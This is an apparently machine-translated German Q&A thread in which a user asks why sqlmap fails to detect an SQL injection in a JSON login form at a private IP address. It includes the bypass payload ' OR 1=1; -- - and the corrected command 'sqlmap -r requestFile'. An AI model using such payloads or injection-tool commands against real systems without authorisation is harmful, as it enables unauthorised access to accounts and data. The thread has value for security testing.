SQLMAP - Post JSON-Daten als Körper

Hallo, ich versuche eine SQL-injection in ein login-Formular.

Mit BurpSuite ich die Anforderung abfangen können:

POST /xxxx/web/Login HTTP/1.1
Host: 10.0.0.70:42020
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: application/json, text/plain, */*
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json
Referer: http://xxxxxx.com/xxxxxx/
Content-Length: 44
origin: http://xxxxx.com
Connection: close

{"username”:"user",”password”:"pass"}

mit:

sqlmap -u requestFile

(wo requestFile ist der Inhalt des Requests abgefangen mit Rülpsen)

sqlmap kann nicht finden, ist die injizierbare Feld Kennwort ein.

Ich bin mir sicher, dass es injizierbaren verursachen, wenn als Passwort habe ich eingegeben:

' OR 1=1; -- -

Ich kann sich mit jedem Benutzernamen die ich einfügen

Versucht auch mit:

{"username”:*,”password”:*}

aber kein Glück.

Was ich falsch mache?

  • Diese Frage kann besser geeignet sein für security.stackexchange.com aber es ist eine Art middleground ich bin nicht an der Abstimmung, um hier zu schließen. Würden Sie wahrscheinlich erhalten mehr Antworten gibt es aber.
  • Ok auch geschrieben in security.stackexchange.com
InformationsquelleAutor ronIDX | 2016-11-16
  1. -2

    sqlmap -u URL

    sqlmap -r requestFile

    Tutorial wie verwenden Wunsch

    schauen Sie das video an

    • Herzlich willkommen auf StackOverflow. Diese Antwort sollte verbessert werden, indem man eine Beschreibung, was der code-Elemente sind, oder eine Erklärung, warum diese Lösung funktioniert.
    • Ja, ich verwendet zu Unrecht -u anstelle von -f. Danke!!!
    • Ops schrieb ich zu Unrecht, dass s -r-nicht f
    InformationsquelleAutor Txomin
Schreibe einen Kommentar